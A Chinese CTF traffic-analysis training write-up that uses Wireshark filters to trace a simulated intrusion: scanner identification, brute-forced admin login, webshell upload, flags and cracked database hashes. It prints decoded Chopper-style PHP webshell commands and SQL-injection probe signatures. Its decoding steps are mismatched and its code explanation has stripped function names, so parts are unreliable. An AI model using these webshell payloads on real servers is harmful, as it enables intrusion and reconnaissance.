题目背景
某公司内网网络被黑客渗透,简单了解,黑客首先攻击了一台web服务器,破解了后台的账户密码,随之利用破解的账号密码登陆了mail系统,然后获取了vpn的申请方式,然后登陆了vpn,在内网pwn掉了一台打印机,请根据提供的流量包回答下面有关问题
关卡列表(web.pcap)
1 某公司内网网络被黑客渗透,请分析流量,给出黑客使用的扫描器
2 某公司内网网络被黑客渗透,请分析流量,得到黑客扫描到的登陆后台是(相对路径即可)
3 某公司内网网络被黑客渗透,请分析流量,得到黑客使用了什么账号密码登录了web后台(形式:username/password)
4 某公司内网网络被黑客渗透,请分析流量,得到黑客上传的webshell文件名是,内容是什么,提交webshell内容的base编码
5 某公司内网网络被黑客渗透,请分析流量,黑客在robots.txt中找到的flag是什么
6 某公司内网网络被黑客渗透,请分析流量,黑客找到的数据库密码是多少
7 某公司内网网络被黑客渗透,请分析流量,黑客在数据库中找到的hash_code是什么
8 某公司内网网络被黑客渗透,请分析流量,黑客破解了账号[email protected]得到的密码是什么
9 某公司内网网络被黑客渗透,请分析流量,被黑客攻击的web服务器,网卡配置是是什么,提交网卡内网ip
解题思路
1 某公司内网网络被黑客渗透,请分析流量,给出黑客使用的扫描器
关于扫描器现在主流的扫描器就那几个,搜一下他们的特征码
扫描器 | User-Agent关键词 | 测试路径/参数 | Payload特征 |
|
---|---|---|---|---|
AWVS | Acunetix
WVS |
/admin
|
|
|
AppScan | AppScan
IBM |
/cgi-bin/
|
AppScan_ |
|
Nessus | Nessus
Tenable |
|
|
|
SQLMap | sqlmap
|
/phpmyadmin |
AND 1=1
SLEEP(5) |
|
一个一个试试,过滤http包 ctrl+f 打开查找 选择分组字节流 搜wvs 找到AWVS扫描器特征
扫描器:AWVS
2 某公司内网网络被黑客渗透,请分析流量,得到黑客扫描到的登陆后台是(相对路径即可)
做这个先要分析常见的后台登录页面路径,不然在几十万的流量包里面找几个登录页面效率太慢了。分析题目黑客登录了后台登录提交的表单一般是POST提交,过滤一下POST流量
http.request.method==POST
拿到登录地址:/admin/login.php?rec=login
3 某公司内网网络被黑客渗透,请分析流量,得到黑客使用了什么账号密码登录了web后台(形式:username/password)
知道登录地址和攻击者IP现在进行过滤,找到攻击者登录成功的包
http.request.method==POST and http contains "rec=login" and ip.addr == 192.168.94.59
看到有很多包,这里都是在尝试登录直接看最后一个,追踪流
看到服务器回应302重定向成功,已经登录上了找到这个登录的流量包。
登录 : admin/admin!@#pass123
4 某公司内网网络被黑客渗透,请分析流量,得到黑客上传的webshell文件名是,内容是什么,提交webshell内容的base编码
上传了webshell,上传肯定是POST过滤一下
http.request.method==POST and ip.addr == 192.168.94.59
还是一样直接看最下面,
上面还是admin下面变成images了包是连接上木马的流量了,追踪流第一个images的包
看到文件上传成功,那就是这个了
在线解密 https://www.toolhelper.cn/EncodeDecode/Url?type=2
QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=L3Zhci93d3cvaHRtbC9pbWFnZXMvYXJ0aWNsZQ%3D%3D
url 解码
QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7aWYoJEQ9PSIiKSREPWRpcm5hbWUoJF9TRVJWRVJbIlBBVEhfVFJBTlNMQVRFRCJdKTskUj0ieyREfVx0IjtpZihzdWJzdHIoJEQsMCwxKSE9Ii8iKXtmb3JlYWNoKHJhbmdlKCJBIiwiWiIpIGFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9JFIuPSJcdCI7JHU9KGZ1bmN0aW9uX2V4aXN0cygncG9zaXhfZ2V0ZWdpZCcpKT9AcG9zaXhfZ2V0cHd1aWQoQHBvc2l4X2dldGV1aWQoKSk6Jyc7JHVzcj0oJHUpPyR1WyduYW1lJ106QGdldF9jdXJyZW50X3VzZXIoKTskUi49cGhwX3VuYW1lKCk7JFIuPSIoeyR1c3J9KSI7cHJpbnQgJFI7O2VjaG8oInw8LSIpO2RpZSgpOw==
base64 解码
@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="t";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("|<-");die();
代码功能解析
关闭错误显示:
"display_errors", "0"); // 隐藏所有PHP错误信息 (
0); // 解除脚本执行时间限制(允许长时间攻击) (
攻击者通过抑制错误提示,避免暴露自身操作。
接收外部参数:
$D = base64_decode($_POST["z1"]); // 解码POST参数z1(需传入Base64编码的目录路径)
攻击者通过POST请求传入
z1 参数(如
z1=L3Zhci93d3cvaHRtbA== 解码为
/var/www/html)。
遍历目录:
$F = ($D); // 尝试打开指定目录
while ($N = ($F)) { // 遍历目录中的文件和子目录
$P = $D . "/" . $N; // 拼接完整文件路径
$T = ("Y-m-d H:i:s", ($P)); // 获取文件修改时间
$E = substr(base_convert( ($P), 10, 8), -4); // 获取文件权限(八进制格式)
$R = "t" . $T . "t" . ($P) . "t" . $E . "n"; // 格式化输出信息
代码会递归读取目录下的所有文件/子目录,并收集以下信息:
文件名、修改时间、文件大小、权限(如
0755)。
输出结果:
echo $M . $L; // 输出所有目录和文件信息
echo("|<-"); // 标记结束符
5 某公司内网网络被黑客渗透,请分析流量,黑客在robots.txt中找到的flag是什么
找文件直接过滤文件
http contains "robots.txt"
追踪流看内容
flag:87b7cb79481f317bde90c116cf36084b
6 某公司内网网络被黑客渗透,请分析流量,黑客找到的数据库密码是多少
http contains "database"
mysql contains "hash_code"
ijnu@test.com/ b78f5aa6e1606f07def6e839121a22ec
md5 解密
ijnu@test.com/ edc123!@#
原文始发于微信公众号(信安一把索):流量分析 - 流量分析训练题
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论